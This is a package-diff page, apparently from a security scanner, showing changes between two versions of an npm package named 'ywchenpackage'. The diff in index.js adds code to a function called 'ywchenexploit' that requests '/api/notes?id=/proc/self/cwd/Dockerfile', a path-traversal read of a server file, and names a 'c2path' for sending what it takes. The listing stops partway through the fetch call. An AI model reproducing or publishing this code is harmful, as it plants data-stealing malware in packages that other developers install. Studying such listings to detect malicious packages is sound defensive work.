ywchenpackage 1.1.0 → 1.1.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +2 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
function ywchenexploit(cookie) {
|
2
|
-
let stolenurl = "/api/notes?id
|
2
|
+
let stolenurl = "/api/notes?id=/proc/self/cwd/Dockerfile";
|
3
3
|
let c2path = "/api/notes";
|
4
|
-
|
4
|
+
var stolen;
|
5
5
|
fetch(stolenurl)
|
6
6
|
.then(
|
7
7
|
(response) => {
|